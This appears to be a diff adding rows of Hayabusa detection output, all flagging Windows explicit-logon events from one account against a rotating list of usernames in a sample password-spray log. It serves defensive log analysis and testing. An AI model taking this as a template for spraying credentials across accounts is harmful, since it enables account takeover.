+2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
